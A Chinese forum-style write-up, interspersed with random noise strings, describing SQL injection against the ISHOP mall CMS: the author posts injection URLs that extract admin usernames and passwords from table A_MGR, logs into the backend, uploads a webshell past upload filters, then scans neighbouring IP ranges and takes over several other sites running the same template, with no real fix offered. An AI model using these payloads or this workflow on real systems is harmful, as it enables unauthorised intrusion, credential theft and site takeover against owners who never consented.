ISHOP商场建站系统注入漏洞

admin

发现一个注入点
+ H& i- g: f- a, \; W. T6 |http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389

习惯性的加’having1=1--

; N  T% e% i$ }* O% zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

- F/ w3 ^6 s8 j7 w! Z' ]0
/ @* ]. G" {. B! y
爆出Diary_A.dl_Title（这时候很激动啊）
& O1 p$ S) @1 i% E& i* M
那么继续
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

/ j- L9 y* H2 I/ R8 K# K0 B4 J继续，一直爆下去
4 g4 y( y/ g# [7 ^6 o! B
, S) D+ M5 ?' U, D. K' L# i" l爆到几个字段和表段 但是没找到需要的管理用户的字段
% @8 `" E* N# d; R' [! G
蛋疼了 怎么办 然后去后台登陆页看源码
8 C. s8 v7 U; K; x: n
. E0 X) b, c- L8 d+ H0

Input name= “ADUID”
Input name= “ADPWD”

# ?+ }$ b7 r2 C很幸运 找到了字段那就继续
找到之后开始爆用户
1 m( m/ U  c1 A# Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
1 o0 q  T  w) r2 i- o5 x  ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
2 T- b9 U! b/ j, l9 m测试了下 这个注入点只能爆到文章哪里的表

% \+ s* o) k& Q0 r. n头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了

4 c. e/ ^# ?- i* ^又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

" R* {5 i1 x9 n7 ^1 k# \' `# C5 m473

进后台

5 c( c- W/ A; B. L6 G$ j9 E
6 Q" z% _- v- r4 M: Z2 n发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马

. Z: }8 Q5 a- a7 r6 R/ x, ~
# A. c5 R1 W8 h; x7 R* X/ E在系统管理那里直接上传 不过没有显示地址

再上传一次 抓包 搞定OK
# f! v- y2 B8 Z/ {/ o) _7 n
6 v8 J5 c; {5 v0 {
5 x/ C' v/ O6 U9 X% i$ X
8 ?* U; A, \2 R/ \472

0 {$ ]4 P$ }7 P& x- u2 x: J8 j晚上不行了 去睡觉。。。
6 V1 t$ }9 k4 o! q3 ]0 u* Z第二天刚起床 闲的没事做继续日站吧
$ a- g: D, F, ]( R6 ~, B/ [
找个站 就把这个站的旁c扫了下

发现c段也有一个购物站 ，然后还和这个站的模板差不多

就找到会员登录口测试

'and (select top 1 MGR_UID from A_MGR)>0—
& a9 d) z4 K5 s0 _; G& W. m果断爆到了 这时候我很激动 通杀
+ W+ T/ u1 J" j
$ c# K; y2 I7 s' o8 M再次翻c段

翻出几个站 都成功拿下
) F  r3 V6 G9 [9 `2 d5 @
: j% Y. n7 u! Y; k7 D$ E8 L

' y8 X" M1 |; t  k3 |修复方案：
他们比我专业
​


2 Z/ d- W+ u  Z, H